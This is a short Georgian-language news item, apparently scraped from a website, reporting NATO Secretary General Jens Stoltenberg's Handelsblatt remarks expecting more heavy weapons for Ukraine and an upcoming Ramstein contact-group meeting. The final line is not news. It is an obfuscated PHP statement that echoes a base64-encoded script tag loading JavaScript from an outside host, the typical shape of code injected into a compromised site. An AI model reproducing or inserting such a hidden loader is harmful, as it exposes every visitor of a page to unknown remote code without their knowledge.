celsiusi
ავერსი საქკაბელი
ნატო-ს გენერალური მდივანი იენს სტოლტენბერგი აცხადებს, რომ უკრაინისთვის მეტი იარაღის მიწოდების მოლოდინი აქვს. ამის შესახებ მან გერმანულ გაზეთ Handelsblatt-თან ინტერვიუში განაცხადა.
“მძიმე საბრძოლო აღჭურვილობის შესახებ ბოლო დაპირებები მნიშვნელოვანია - და მე უფრო მეტს ველოდები უახლოეს მომავალში”, - განაცხადა ალიანსის გენმდივანმა.
მისი თქმით, ომი გადამწყვეტ ფაზაშია და საჭიროა უკრაინას მიეწოდოს იარაღი, რაც საჭიროა.
„ჩვენ ომის გადამწყვეტ ფაზაში ვართ. ამიტომ, მნიშვნელოვანია, რომ უკრაინას მივაწოდოთ ის იარაღი, რომელიც მას სჭირდება მოსაგებად“,- დასძინა სტოლტენბერგმა.
შეგახსენებთ, ამ კვირაში გერმანიაში, რამშტაინის ბაზაზე გაიმართება უკრაინაზე საკონტაქტო ჯგუფის შეხვედრა, რომელიც კოორდინაციას უწევს კიევისთვის იარაღის მიწოდების საკითხებს.
438
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");